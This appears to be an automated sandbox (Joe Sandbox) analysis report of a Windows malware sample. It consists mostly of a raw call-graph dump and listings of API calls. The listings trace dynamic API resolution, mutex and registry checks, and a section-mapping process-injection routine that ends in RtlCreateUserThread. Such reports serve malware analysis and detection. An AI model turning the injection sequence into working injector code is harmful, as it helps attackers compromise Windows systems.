GetProcAddress 18599->18600 18636 3181a8 18599->18636 18600->18598 18604 318150 18600->18604 18601 3182eb LoadLibraryW 18610 318306 18601->18610 18601->18634 18602 318173 GetProcAddress 18602->18604 18602->18636 18603 3182a0 GetProcAddress 18603->18605 18603->18636 18604->18599 18604->18600 18604->18602 18605->18601 18609 318239 18605->18609 18606 3183e0 
LoadLibraryW 18615 3183fb 18606->18615 18606->18634 18607 31825f GetProcAddress 18607->18609 18607->18636 18608 318395 GetProcAddress 18608->18610 18608->18636 18609->18603 18609->18605 18609->18607 18610->18606 18614 31832e 18610->18614 18611 3184d5 LoadLibraryW 18622 3184f0 18611->18622 18611->18634 18612 318354 GetProcAddress 18612->18614 18612->18636 18613 31848a GetProcAddress 18613->18615 18613->18636 18614->18608 18614->18610 18614->18612 18615->18611 18619 318423 18615->18619 18616 318449 GetProcAddress 18616->18619 18616->18636 18617 3185ca LoadLibraryW 18624 3185e5 18617->18624 18617->18634 18618 31857f GetProcAddress 18618->18622 18618->18636 18619->18613 18619->18615 18619->18616 18620 31853e GetProcAddress 18620->18622 18620->18634 18621 3186bf LoadLibraryW 18631 3186da 18621->18631 18621->18634 18622->18617 18622->18618 18622->18620 18623 318674 GetProcAddress 18623->18624 18623->18636 18624->18621 18627 31860d 18624->18627 18625 318633 GetProcAddress 18625->18627 18625->18636 18626 3187b4 LoadLibraryW 18628 3187cf 18626->18628 18626->18634 18627->18623 18627->18624 18627->18625 18632 3188a9 LoadLibraryW 18628->18632 18640 3187f7 18628->18640 18629 318769 GetProcAddress 18629->18631 18629->18636 18630 318702 18630->18629 18630->18631 18633 318728 GetProcAddress 18630->18633 18631->18626 18631->18630 18632->18634 18641 3188c4 18632->18641 18633->18630 18633->18636 18634->17856 18634->17857 18635 31885e GetProcAddress 18635->18628 18635->18636 18636->18634 18637 31899e LoadLibraryW 18637->18634 18646 3189b9 18637->18646 18638 31881d GetProcAddress 18638->18636 18638->18640 18639 318953 GetProcAddress 18639->18636 18639->18641 18640->18628 18640->18635 18640->18638 18641->18637 18645 3188ec 18641->18645 18642 318a93 LoadLibraryW 18642->18634 18651 318aae 18642->18651 18643 318912 GetProcAddress 18643->18636 18643->18645 18644 318a48 GetProcAddress 18644->18636 18644->18646 18645->18639 18645->18641 18645->18643 18646->18642 18650 3189e1 18646->18650 
18647 318b88 LoadLibraryW 18647->18634 18656 318ba3 18647->18656 18648 318a07 GetProcAddress 18648->18636 18648->18650 18649 318b3d GetProcAddress 18649->18636 18649->18651 18650->18644 18650->18646 18650->18648 18651->18647 18655 318ad6 18651->18655 18652 318c7d LoadLibraryW 18652->18634 18661 318c98 18652->18661 18653 318afc GetProcAddress 18653->18636 18653->18655 18654 318c32 GetProcAddress 18654->18636 18654->18656 18655->18649 18655->18651 18655->18653 18656->18652 18660 318bcb 18656->18660 18657 318bf1 GetProcAddress 18657->18636 18657->18660 18658 318d72 LoadLibraryW 18658->18634 18666 318d8d 18658->18666 18659 318d27 GetProcAddress 18659->18636 18659->18661 18660->18654 18660->18656 18660->18657 18661->18658 18664 318cc0 18661->18664 18662 318ce6 GetProcAddress 18662->18636 18662->18664 18663 318e67 LoadLibraryW 18663->18634 18674 318e82 18663->18674 18664->18659 18664->18661 18664->18662 18665 318e1c GetProcAddress 18665->18636 18665->18666 18666->18663 18669 318db5 18666->18669 18667 318ddb GetProcAddress 18667->18636 18667->18669 18668 318f5c LoadLibraryW 18668->18634 18677 318f77 18668->18677 18669->18665 18669->18666 18669->18667 18670 318f11 GetProcAddress 18670->18636 18670->18674 18671 319051 LoadLibraryW 18671->18634 18678 31906c 18671->18678 18672 318ed0 GetProcAddress 18672->18634 18672->18674 18673 319006 GetProcAddress 18673->18636 18673->18677 18674->18668 18674->18670 18674->18672 18675 318fc5 GetProcAddress 18675->18634 18675->18677 18676 3190f8 GetProcAddress 18676->18636 18676->18678 18677->18671 18677->18673 18677->18675 18678->18634 18680 319094 18678->18680 18679 3190ba GetProcAddress 18679->18636 18679->18680 18680->18676 18680->18678 18680->18679 18682 301089 18681->18682 18683 309caa GetProcAddress 18681->18683 18686 31c1e0 GetModuleHandleW GetProcAddress 18682->18686 18684 309cc2 18683->18684 18685 309cc8 FreeLibrary 18683->18685 18684->18685 18685->18682 18687 31c21c GetCurrentProcess 18686->18687 18688 30108e 
Wow64DisableWow64FsRedirection GetCurrentProcess CreateMutexW 18686->18688 18687->18688 18688->17866 18688->17867 18690 31268d RegOpenKeyW 18689->18690 18691 3126be 18689->18691 18690->18691 18692 3126a5 RegDeleteValueW RegCloseKey 18690->18692 18693 3126c7 RegOpenKeyW 18691->18693 18694 3126f8 18691->18694 18692->18691 18693->18694 18695 3126df RegDeleteValueW RegCloseKey 18693->18695 18694->17868 18695->18694 19118 323520 18696->19118 18699 30b8a4 _memset 18700 30b8c0 GetWindowsDirectoryW 18699->18700 18701 30b8dd _memset 18700->18701 18710 30110e 18700->18710 18702 30b8f9 GetSystemDirectoryW 18701->18702 18703 30b916 _memset 18702->18703 18702->18710 18704 32359a __snwprintf 102 API calls 18703->18704 18705 30b952 _memset 18704->18705 18706 32359a __snwprintf 102 API calls 18705->18706 18707 30b991 _memset 18706->18707 18708 32359a __snwprintf 102 API calls 18707->18708 18709 30b9d0 StrCmpIW 18708->18709 18709->18710 18711 30b9eb StrCmpIW 18709->18711 18710->17872 18710->17873 18711->18710 18712 30ba03 StrCmpIW 18711->18712 18712->18710 18714 31bb72 GetModuleFileNameW 18713->18714 18753 31bb68 18713->18753 18715 31bb91 18714->18715 18714->18753 18718 31bbb0 OpenMutexW 18715->18718 18759 31bbab 18715->18759 18721 31bbe5 18718->18721 18718->18753 18720 301191 RtlExitUserThread 18720->17873 19120 302160 18721->19120 18722 31be60 19256 305060 18722->19256 18732 31be73 ExitProcess 18733 31be7b 19265 316be0 18733->19265 18738 31be95 18741 31bea5 18738->18741 18742 31be9b CloseHandle 18738->18742 18739 31be89 CloseHandle 18739->18738 18743 31becc 18741->18743 18744 31bebf CloseHandle 18741->18744 18742->18741 18746 31bed2 LocalFree 18743->18746 18747 31bedc 18743->18747 18744->18743 18746->18747 18747->18720 18749 31bee5 ExitProcess 18747->18749 19242 3021e0 18753->19242 18757 31bc82 CreateMutexW 18758 31bc9f 18757->18758 18757->18759 18760 31c4b0 4 API calls 18758->18760 18759->18720 18761 31bcb0 18760->18761 19196 30bc80 LocalAlloc 18761->19196 18764 31bcc4 
CreateMutexW 18764->18759 18765 31bce1 18764->18765 18766 31c4b0 4 API calls 18765->18766 18767 31bcf2 18766->18767 19209 30bd80 LocalAlloc 18767->19209 18788 3100e5 lstrcmpiW 18787->18788 18789 30119e 18787->18789 18790 3101c6 lstrcmpiW 18788->18790 18791 3100ff IsUserAnAdmin 18788->18791 18789->17880 18789->17881 18792 3101e0 OpenMutexW 18790->18792 18793 3102a5 lstrcmpiW 18790->18793 18794 310114 OpenEventW 18791->18794 18795 31016c ExitProcess 18791->18795 18798 310214 OpenMutexW 18792->18798 18799 3101fb WaitForSingleObject CloseHandle 18792->18799 18796 3102bf OpenMutexW 18793->18796 18797 31037e lstrcmpiW 18793->18797 18800 310162 ExitProcess 18794->18800 18801 310136 SetEvent 18794->18801 18802 3102f3 OpenMutexW 18796->18802 18803 3102da WaitForSingleObject CloseHandle 18796->18803 18797->18789 18806 310394 18797->18806 18804 310248 18798->18804 18805 31022f WaitForSingleObject CloseHandle 18798->18805 18799->18798 18807 310144 CloseHandle ExitProcess 18801->18807 18808 310156 CloseHandle 18801->18808 18809 310327 18802->18809 18810 31030e WaitForSingleObject CloseHandle 18802->18810 18803->18802 18811 310251 OpenMutexW 18804->18811 18812 31028b Sleep 18804->18812 18805->18804 18813 3103d7 Sleep 18806->18813 18814 31039d OpenMutexW 18806->18814 18815 31016a 18808->18815 18816 310330 OpenMutexW 18809->18816 18817 31036a Sleep 18809->18817 18810->18809 18818 310273 CloseHandle Sleep 18811->18818 18819 310287 18811->18819 18812->18789 18813->18789 18820 3103d3 18814->18820 18821 3103bf CloseHandle Sleep 18814->18821 18822 3101b3 18815->18822 18823 31017d OpenMutexW 18815->18823 18824 310352 CloseHandle Sleep 18816->18824 18825 310366 18816->18825 18817->18789 18818->18804 18819->18812 18820->18813 18821->18806 18822->18789 18823->18822 18826 31019f CloseHandle Sleep 18823->18826 18824->18809 18825->18817 18826->18815 18828 31c0c9 RtlGetVersion 18827->18828 18829 301285 18827->18829 18828->18829 18829->17889 18830 31c3a0 AllocateAndInitializeSid 18829->18830 
18831 31c3ea CheckTokenMembership 18830->18831 18832 30128f 18830->18832 18833 31c405 FreeSid 18831->18833 18834 31c3fe 18831->18834 18832->17889 18835 316410 LocalAlloc 18832->18835 18833->18832 18834->18833 18836 316452 18835->18836 18837 316850 18835->18837 18838 31684a 18836->18838 18840 316486 _wcscat 18836->18840 18837->17916 18838->18837 18839 316858 LocalFree 18838->18839 18839->18837 18841 3164bf 18840->18841 18842 31650e 18840->18842 18845 32359a __snwprintf 102 API calls 18841->18845 18843 316527 LocalAlloc 18842->18843 18844 3165cc 18842->18844 18846 316547 GetWindowsDirectoryW 18843->18846 18862 3165c7 18843->18862 18847 3165e1 SHGetKnownFolderPath 18844->18847 18848 31665e 18844->18848 18865 3164e9 _wcscat 18845->18865 18849 3165ba LocalFree 18846->18849 18850 31655d 18846->18850 18853 3165fb 18847->18853 18847->18865 18851 3166f0 18848->18851 18852 316673 SHGetKnownFolderPath 18848->18852 18849->18862 18854 32359a __snwprintf 102 API calls 18850->18854 18856 316709 LocalAlloc 18851->18856 18857 3167b8 18851->18857 18855 31668d 18852->18855 18852->18865 18858 32359a __snwprintf 102 API calls 18853->18858 18859 31659a _wcscat 18854->18859 18860 32359a __snwprintf 102 API calls 18855->18860 18856->18862 18863 316729 GetTempPathW 18856->18863 18861 3167cd SHGetKnownFolderPath 18857->18861 18857->18865 18864 31662c CoTaskMemFree 18858->18864 18859->18849 18866 3166be CoTaskMemFree 18860->18866 18861->18865 18867 3167e7 18861->18867 18862->18865 18868 3167a6 LocalFree 18863->18868 18869 31673f 18863->18869 18864->18865 18865->17916 18866->18865 18870 32359a __snwprintf 102 API calls 18867->18870 18868->18862 18872 32359a __snwprintf 102 API calls 18869->18872 18871 316818 CoTaskMemFree 18870->18871 18871->18865 18873 316786 _wcscat 18872->18873 18873->18868 18875 316893 GetSystemDirectoryW 18874->18875 18876 3012c3 LocalFree 18874->18876 18877 316987 LocalFree 18875->18877 18878 3168aa LocalAlloc 18875->18878 18876->17889 18877->18876 18878->18877 18879 
3168c4 18878->18879 18880 3179f0 5 API calls 18879->18880 18881 3168e6 18880->18881 18882 32359a __snwprintf 102 API calls 18881->18882 18883 316902 _memset 18882->18883 18884 316915 CreateProcessW 18883->18884 18885 316962 LocalFree LocalFree 18884->18885 18886 31697d LocalFree 18884->18886 18885->18876 18886->18877 18888 31c4f0 GetSecurityDescriptorSacl 18887->18888 18889 30133e CreateEventW 18887->18889 18890 31c525 LocalFree 18888->18890 18891 31c50a SetNamedSecurityInfoW 18888->18891 18889->17907 18889->17908 18890->18889 18891->18890 18893 30fa51 GetModuleFileNameW 18892->18893 18894 301563 18892->18894 18895 30fa6b 18893->18895 18896 30fa6f LoadLibraryW 18893->18896 18894->17934 18894->17935 18895->18894 18896->18895 18897 30fa8d GetModuleFileNameW 18896->18897 18897->18895 18899 31760c CreateMutexW 18898->18899 18901 301574 18898->18901 18900 317629 18899->18900 18899->18901 18900->18901 18901->17942 18901->17943 18903 32359a __snwprintf 102 API calls 18902->18903 18904 314204 RegCreateKeyExW 18903->18904 18905 314234 RegCloseKey 18904->18905 18911 301585 18904->18911 18906 31424b _memset 18905->18906 18907 30b4a0 103 API calls 18906->18907 18908 314257 18907->18908 18909 31425e GetSystemTime SystemTimeToFileTime 18908->18909 18908->18911 21086 30b510 18909->21086 18911->17952 18911->17953 18913 323520 _memset 18912->18913 18914 3142d9 GetModuleFileNameW 18913->18914 18915 301596 18914->18915 18916 3142f8 18914->18916 18915->17957 18915->17958 21093 31c570 CreateFileW 18916->21093 18919 32359a __snwprintf 102 API calls 18920 31433c RegOpenKeyExW 18919->18920 18921 314363 RegSetValueExW 18920->18921 18922 3143b9 LocalFree 18920->18922 18923 31438b RegCloseKey LocalFree 18921->18923 18924 3143ac RegCloseKey 18921->18924 18922->18915 18923->18915 18924->18922 18926 323520 _memset 18925->18926 18927 3143f5 GetModuleFileNameW 18926->18927 18928 314414 18927->18928 18929 3015a7 18927->18929 18930 32359a __snwprintf 102 API calls 18928->18930 18929->17966 
18929->17967 18931 31442f RegOpenKeyExW 18930->18931 18931->18929 18932 314456 lstrlenW RegSetValueExW 18931->18932 18933 314489 RegCloseKey 18932->18933 18934 31449d RegCloseKey 18932->18934 18933->18929 18934->18929 18936 30ff31 LocalAlloc 18935->18936 18937 3015df 18935->18937 18938 30fff5 CoTaskMemFree 18936->18938 18939 30ff4b wnsprintfW 18936->18939 18937->17978 18937->17979 18938->18937 19011 301cb5 _memset 19010->19011 19012 301240 19010->19012 19013 301cd1 GetWindowsDirectoryW 19011->19013 19012->17930 19012->17931 19014 301cee _memset 19013->19014 19015 301fdf 19013->19015 19017 31c1e0 3 API calls 19014->19017 19015->19012 19016 301fe5 CloseHandle 19015->19016 19016->19012 19018 301d12 19017->19018 19019 301d17 19018->19019 19020 301d39 19018->19020 19022 32359a __snwprintf 102 API calls 19019->19022 19021 32359a __snwprintf 102 API calls 19020->19021 19023 301d34 _memset 19021->19023 19022->19023 19024 301d75 GetCurrentDirectoryW 19023->19024 19024->19015 19025 301d92 LocalAlloc 19024->19025 19025->19015 19026 301dbc 14 API calls 19025->19026 19027 30a1b0 26 API calls 19026->19027 19028 301f67 19027->19028 19029 301fc9 19028->19029 19030 301f6f WaitForSingleObject 19028->19030 19029->19015 19032 301fd2 LocalFree 19029->19032 19031 301f90 TerminateProcess CloseHandle CloseHandle 19030->19031 19031->19029 19032->19015 21140 30fcf0 19034->21140 19037 30fe82 lstrlenW lstrlenW LocalAlloc 19039 30ff00 CoTaskMemFree 19037->19039 19040 30fec1 19037->19040 19038 3013c5 19038->17940 19038->17941 19039->19038 19041 32359a __snwprintf 102 API calls 19040->19041 19042 30fedf lstrlenW CoTaskMemFree 19041->19042 19042->19038 19044 30fe20 109 API calls 19043->19044 19045 30faed 19044->19045 19119 30b885 GetModuleFileNameW 19118->19119 19119->18699 19119->18710 19121 302173 CreateEventW 19120->19121 19122 30216c 19120->19122 19121->19122 19123 30218f CreateThread 19121->19123 19122->18753 19125 3041f0 19122->19125 19123->19122 19124 3021b9 CloseHandle 19123->19124 19296 
3025a0 19123->19296 19124->19122 19126 3041fc 19125->19126 19127 30420f CreateEventW 19125->19127 19126->19127 19129 304205 19126->19129 19128 30422b CreateEventW 19127->19128 19127->19129 19130 304287 CloseHandle 19128->19130 19131 304247 CreateThread 19128->19131 19129->18753 19133 317640 19129->19133 19130->19129 19131->19129 19132 304271 CloseHandle 19131->19132 19409 304320 19131->19409 19132->19130 19134 317653 CreateThread 19133->19134 19135 31764c 19133->19135 19134->19135 19694 3176f0 GetModuleHandleW 19134->19694 19135->18753 19136 306850 GetModuleHandleW GetProcAddress GetProcAddress 19135->19136 19137 306890 19136->19137 19137->18753 19138 3169a0 lstrlenW 19137->19138 19139 3169f7 19138->19139 19140 3169b8 CreateEventW 19138->19140 19143 316adf 19139->19143 19145 31c3a0 3 API calls 19139->19145 19140->19139 19141 3169d4 CreateThread 19140->19141 19141->19139 19142 3169fb LocalFree 19141->19142 20240 30ba30 19141->20240 19142->19139 19144 316aed 19143->19144 19784 312560 19143->19784 19147 316afb 19144->19147 19797 3122d0 LocalAlloc 19144->19797 19148 316a23 19145->19148 19150 316b09 19147->19150 19832 31ac50 CreateThread 19147->19832 19148->19143 19151 30fe20 109 API calls 19148->19151 19834 308cd0 19150->19834 19162 316a51 _memset 19151->19162 19155 316b6a WSAStartup 19157 316bc3 19155->19157 19158 316b7d 19155->19158 19156 316b1c CreateEventW 19156->19155 19159 316b38 CreateThread 19156->19159 19157->18753 19170 305010 19157->19170 19160 316ba0 CreateThread 19158->19160 19161 316b86 CreateThread 19158->19161 19163 316b5b 19159->19163 19164 316b5d CloseHandle 19159->19164 20256 30f100 19159->20256 19160->19157 19165 316bca WSACleanup 19160->19165 20316 321030 OpenEventW 19160->20316 19161->19160 20375 31b630 CreateEventW 19161->20375 19162->19143 19166 32359a __snwprintf 102 API calls 19162->19166 19163->19155 19164->19155 19165->19157 19167 316aa4 19166->19167 19705 30a680 19167->19705 19171 305023 CreateThread 19170->19171 19172 30501c 19170->19172 
19171->19172 20898 305140 LocalAlloc 19171->20898 19172->18753 19173 3045b0 19172->19173 19174 3045c3 19173->19174 19178 3045bc 19173->19178 21069 304700 19174->21069 19177 30460d CreateThread 19177->19178 19178->18753 19183 30bb80 LocalAlloc 19178->19183 19181 304700 103 API calls 19182 304602 19181->19182 19182->19177 19182->19178 19184 30bba0 LocalAlloc 19183->19184 19185 30bc6b 19183->19185 19186 30bc61 LocalFree 19184->19186 19187 30bbba LocalAlloc 19184->19187 19185->18757 19185->18758 19186->19185 19188 30bbd4 GetModuleFileNameW 19187->19188 19189 30bc57 LocalFree 19187->19189 19190 30bbe9 GetWindowsDirectoryW 19188->19190 19191 30bc4d LocalFree 19188->19191 19189->19186 19190->19191 19192 30bbfc 19190->19192 19191->19189 19193 32359a __snwprintf 102 API calls 19192->19193 19194 30bc13 lstrcmpiW 19193->19194 19194->19191 19195 30bc28 LocalFree LocalFree LocalFree 19194->19195 19195->19185 19197 30bca0 LocalAlloc 19196->19197 19198 30bd6b 19196->19198 19199 30bd61 LocalFree 19197->19199 19200 30bcba LocalAlloc 19197->19200 19198->18764 19198->18765 19199->19198 19201 30bcd4 GetModuleFileNameW 19200->19201 19202 30bd57 LocalFree 19200->19202 19203 30bce9 GetSystemDirectoryW 19201->19203 19204 30bd4d LocalFree 19201->19204 19202->19199 19203->19204 19205 30bcfc 19203->19205 19204->19202 19206 32359a __snwprintf 102 API calls 19205->19206 19210 30bda0 LocalAlloc 19209->19210 19211 30be6b 19209->19211 19243 3021f8 19242->19243 19244 3021ec SetEvent 19242->19244 19245 302201 WaitForSingleObject CloseHandle 19243->19245 19246 302227 19243->19246 19244->19243 19245->19246 19247 302230 CloseHandle 19246->19247 19248 302246 19246->19248 19247->19248 19249 3042b0 19248->19249 19250 3042c8 19249->19250 19251 3042bc SetEvent 19249->19251 19252 3042d1 WaitForSingleObject CloseHandle 19250->19252 19253 3042f7 19250->19253 19251->19250 19252->19253 19254 304300 CloseHandle 19253->19254 19255 304316 19253->19255 19254->19255 19255->18722 19257 30507a 19256->19257 19258 
                                                                                                            APIs
                                                                                                              • Part of subcall function 00318110: LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 0031811E
                                                                                                            • ExitProcess.KERNEL32 ref: 0030103F
                                                                                                            • _memset.LIBCMT ref: 0030105C
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00301072
                                                                                                            • ExitProcess.KERNEL32 ref: 0030107E
                                                                                                            Strings
                                                                                                            • {0F01F64A-5A5B-4CC4-B069-D85368F634DD}, xrefs: 0030149F
                                                                                                            • {DDA8C395-C285-4429-AF60-F1383F7E39E4}, xrefs: 003014B8
                                                                                                            • {8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}, xrefs: 003011B4, 003011EA
                                                                                                            • {DD700AA6-D197-4A4A-838A-B93EA96F236B}, xrefs: 00301117, 00301341, 00301368
                                                                                                            • {16875766-AD57-416F-8330-F0B6BCC3AFF1}, xrefs: 003010D1
                                                                                                            • {D3378A42-4880-48C8-9826-A27CECC41889}, xrefs: 003012D3
                                                                                                            • %s\svchost.exe, xrefs: 00301744
                                                                                                            • {FF4E2D7F-189B-498D-BED3-F1AA783F6E3F}, xrefs: 00301A5D
                                                                                                            • {7A93683D-6831-4ED6-AF6B-BEBF672AD8B7}, xrefs: 00301ADC
                                                                                                            • {7E105FD4-6112-4FB9-A722-91E984087449}, xrefs: 0030130E, 00301334
                                                                                                            • {A3956157-6EDC-4743-A7B9-FF7CDC2529A9}, xrefs: 003014D1
                                                                                                            • {8D32440A-6991-45E9-84BE-12C6B52AF58D}, xrefs: 00301149, 00301964
                                                                                                            • {6B55C48E-8FCD-482F-91CF-9C0B3FD8AC2B}, xrefs: 003019DF
                                                                                                            • %s\explorer.exe, xrefs: 00301703
                                                                                                            • %s\cmd.exe, xrefs: 00301788
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess$FileLibraryLoadModuleName_memset
                                                                                                            • String ID: %s\cmd.exe$%s\explorer.exe$%s\svchost.exe${0F01F64A-5A5B-4CC4-B069-D85368F634DD}${16875766-AD57-416F-8330-F0B6BCC3AFF1}${6B55C48E-8FCD-482F-91CF-9C0B3FD8AC2B}${7A93683D-6831-4ED6-AF6B-BEBF672AD8B7}${7E105FD4-6112-4FB9-A722-91E984087449}${8D32440A-6991-45E9-84BE-12C6B52AF58D}${8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}${A3956157-6EDC-4743-A7B9-FF7CDC2529A9}${D3378A42-4880-48C8-9826-A27CECC41889}${DD700AA6-D197-4A4A-838A-B93EA96F236B}${DDA8C395-C285-4429-AF60-F1383F7E39E4}${FF4E2D7F-189B-498D-BED3-F1AA783F6E3F}
                                                                                                            • API String ID: 3630785697-1529498503
                                                                                                            • Opcode ID: 4b8f08dff92619335788efe2a3d966763562fbf4dd16112064c6bf736eedf7b3
                                                                                                            • Instruction ID: 164f6012a254188a58e58620fdb03f5d47675ec8427cee1478b6d24e2cbb3f34
                                                                                                            • Opcode Fuzzy Hash: 4b8f08dff92619335788efe2a3d966763562fbf4dd16112064c6bf736eedf7b3
                                                                                                            • Instruction Fuzzy Hash: 8E628170A51218DFEB379FA0EC99B9977B8BB48705F1050A8F60DAA1D1DBB45AC0CF11

                                                                                                            Control-flow Graph
                                                                                                            (graph of the function starting at 3138d0, rendered in the original report with nodes marked Executed / Not Executed; the API calls of its blocks are listed under APIs below)
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 003138D9
                                                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 003138E9
                                                                                                            • _memset.LIBCMT ref: 00313906
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 00313919
                                                                                                              • Part of subcall function 00301C60: _wcsrchr.LIBCMT ref: 00301C6C
                                                                                                            • _memset.LIBCMT ref: 00313940
                                                                                                            • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,?,00000044,?), ref: 0031398A
                                                                                                            • NtCreateSection.NTDLL(00000000,00000006,00000000,000005F0,00000004,08000000,00000000), ref: 00313A0B
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,000005F0,00000002,00000000,00000004), ref: 00313A52
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 00313A60
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,000005F0,00000002,00000000,00000004), ref: 00313AAB
                                                                                                            • NtCreateSection.NTDLL(00000000,0000000E,00000000,?,00000040,08000000,00000000), ref: 00313B06
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 00313B4F
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 00313B5D
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 00313BA8
                                                                                                            • NtCreateSection.NTDLL(00000000,00000006,00000000,?,00000004,08000000,00000000), ref: 00313BF7
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 00313C3D
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 00313C4B
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 00313C96
                                                                                                            • _memmove.LIBCMT ref: 00313CBE
                                                                                                            • _memmove.LIBCMT ref: 00313CF7
                                                                                                            • _memmove.LIBCMT ref: 00313D30
                                                                                                            • lstrcpyW.KERNEL32(?,KERNEL32.DLL), ref: 00313D50
                                                                                                            • lstrcpyW.KERNEL32(?,USER32.DLL), ref: 00313D68
                                                                                                            • lstrcpyA.KERNEL32(?,LoadLibraryW), ref: 00313D80
                                                                                                            • lstrcpyA.KERNEL32(?,GetProcAddress), ref: 00313D97
                                                                                                            • lstrcpyA.KERNEL32(?,Sleep), ref: 00313DAF
                                                                                                            • lstrcpyA.KERNEL32(?,LoadLibraryA), ref: 00313DC7
                                                                                                            • lstrcpyA.KERNEL32(?,LocalAlloc), ref: 00313DDE
                                                                                                            • lstrcpyA.KERNEL32(?,VirtualAlloc), ref: 00313DF6
                                                                                                            • lstrcpyA.KERNEL32(?,LocalFree), ref: 00313E0E
                                                                                                            • lstrcpyA.KERNEL32(?,CloseHandle), ref: 00313E25
                                                                                                            • lstrcpyA.KERNEL32(?,VirtualFree), ref: 00313E3D
                                                                                                            • lstrcpyA.KERNEL32(?,MessageBoxW), ref: 00313E55
                                                                                                            • lstrcpyA.KERNEL32(?,VirtualProtect), ref: 00313E6C
                                                                                                            • _memmove.LIBCMT ref: 00313EA9
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00313EC5
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 003140C2
                                                                                                              • Part of subcall function 00305720: GetCurrentProcess.KERNEL32(0037CB2C,?,00313EE3), ref: 00305728
                                                                                                              • Part of subcall function 00305720: IsWow64Process.KERNEL32(00000000,?,00313EE3), ref: 0030572F
                                                                                                              • Part of subcall function 00305720: GetProcessHeap.KERNEL32(?,00313EE3), ref: 00305735
                                                                                                            • GetModuleHandle64.DOWNLOADED_FILE(NTDLL.DLL), ref: 00313EE8
                                                                                                            • GetProcAddress64.DOWNLOADED_FILE(?,?,RtlCreateUserThread), ref: 00313F0F
                                                                                                            • X64Call.DOWNLOADED_FILE(?,?,0000000A,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00313F79
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 00313FA0
                                                                                                            • ResetEvent.KERNEL32(00000000), ref: 00313FB3
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00313FD7
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00313FEB
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00313FFF
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314010
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314021
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314032
                                                                                                            • NtClose.NTDLL(00000000), ref: 0031403F
                                                                                                            • NtClose.NTDLL(00000000), ref: 0031404C
                                                                                                            • NtClose.NTDLL(00000000), ref: 00314059
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00314066
                                                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00314073
                                                                                                            • ResetEvent.KERNEL32(00000000), ref: 003140A1
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003140AE
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 003140D3
                                                                                                            • NtClose.NTDLL(00000000), ref: 003140E0
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 003140F4
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314105
                                                                                                            • NtClose.NTDLL(00000000), ref: 00314112
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314126
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314137
                                                                                                            • NtClose.NTDLL(00000000), ref: 00314144
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00314151
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0031415E
                                                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 0031416B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
